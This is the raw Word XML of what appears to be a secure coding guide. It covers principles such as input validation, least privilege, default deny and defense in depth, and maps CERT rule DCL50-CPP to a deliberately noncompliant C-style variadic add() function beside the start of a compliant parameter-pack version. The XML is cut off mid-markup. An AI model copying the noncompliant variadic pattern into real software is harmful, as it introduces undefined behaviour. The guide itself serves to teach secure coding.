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0D7A7DE" w:rsidR="00381847" w:rsidRDefault="00536054">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Input from untrusted sources of data such as command line arguments and environmental variables must be validated in an effort to eliminate most software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BBAEF4E" w:rsidR="00381847" w:rsidRDefault="00536054">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Code should be compiled with the highest warning level that is currently available on your compiler. Warnings should also be eliminated by modifying code. Lastly, dynamic and static analysis tools should be used to find and destroy otherwise missed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96D64EC" w:rsidR="00381847" w:rsidRDefault="00536054">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Software architecture should be designed and created with an approach to both implement and enforce security policies. Such policies may include the principle of least privilege, default deny, and other security principles on this list.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364510C" w:rsidR="00381847" w:rsidRDefault="00536054">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Designs should be small and simple in an effort to minimize errors that could arise in the process of creating and using a more complex design. Keeping designs simple also requires less effort to achieve the necessary level of assurance/security.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85D71DD" w:rsidR="00381847" w:rsidRDefault="00536054">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00733063">
              <w:t>ccess decisions are based on permission, not exclusion; this means that access is denied by default and the protection scheme is created to identify when and how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99BCA31" w:rsidR="00381847" w:rsidRDefault="00733063">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Each process should only incorporate the least set of privileges necessary to get the job done. If a job requires elevated privileges, permission must be accessed only for the time required and no more.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C3C08D8" w:rsidR="00381847" w:rsidRDefault="00413CFA">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data passed to complex subsystems including relational databases, command shells, etc., should be sanitized. Attackers can take advantage of unused functionality of these subsystems through the use of injection attacks such as SQL and command. The calling process understands the context in which a call is </w:t>
            </w:r>
            <w:r w:rsidR="004E2F8D">
              <w:t>made and</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is therefore responsible for sanitizing the data before the subsystem is invoked.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0C08B68" w:rsidR="00381847" w:rsidRDefault="00413CFA">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>If one defensive layer is inadequate, there must by other layers of defense to prevent more security issues/vulnerabilities or lessen the effect of the exploit that succeeded.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13E427A" w:rsidR="00381847" w:rsidRDefault="00413CFA">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Quality assurance techniques such as penetration testing, source code audits, and fuzz testing are good examples to combat vulnerabilities by identifying and eliminating them. All of these techniques should be included in an effective program.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A3FB177" w:rsidR="00381847" w:rsidRDefault="00733063">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Based on the development language and platform chosen, an appropriate secure coding standard should be either developed or applied.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137F1F6" w:rsidR="00381847" w:rsidRDefault="00492D52">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>DCL50-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7140E542" w14:textId="265B3DAE" w:rsidR="00381847" w:rsidRDefault="00492D52">
            <w:r w:rsidRPr="00492D52">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E5F5052" w:rsidR="00F72634" w:rsidRDefault="00DA57A8" w:rsidP="0015146B">
            <w:r>
              <w:t>This function reads arguments until 0 is discovered. Calling the function without passing 0 as an argument after the first two arguments, or passing any type other than int,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05DB78C4" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>#include &lt;cstdarg&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB4AFC6" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C81E16" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> add(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> first, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> second, ...) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5537260E" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> r = first + second; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FBBCEC9" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>va_list</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> va;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F8DDD9" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>va_start</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>(va, second);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406385BB" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>while</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> v = </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>va_arg</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>(va, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450E1DBE" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>    r += v;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4997CE73" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FD7F61B" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>va_end</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>(va);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B094BF6" w14:textId="77777777" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="00DA57A8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA57A8">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t> r;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ECD0D5A" w14:textId="2135F871" w:rsidR="00DA57A8" w:rsidRPr="00DA57A8" w:rsidRDefault="00DA57A8" w:rsidP="0015146B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA57A8">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B56523C" w:rsidR="00F72634" w:rsidRDefault="00DA57A8" w:rsidP="0015146B">
            <w:r>
              <w:t>A variadic function using a function parameter pack to implement add()</w:t>
            </w:r>
            <w:r w:rsidR="00317E68">
              <w:t xml:space="preserve"> which allows for identical call site behavior. This does not result in undefined behavior if the parameters are not terminated with 0 or if any of the values passed are not integers (however, the code would be ill-formed).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="4EAB134E" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06AAC373" w14:textId="77777777" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;type_traits&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6018CF18" w14:textId="77777777" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32CDAE07" w14:textId="77777777" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>template</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>typename</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Arg, </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>typename</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::enable_if&lt;std::is_integral&lt;Arg&gt;::value&gt;::type * = nullptr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="179A0203" w14:textId="77777777" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>add(Arg f, Arg s) { </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f + s; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A4BDACD" w14:textId="77777777" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B15964F" w14:textId="77777777" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
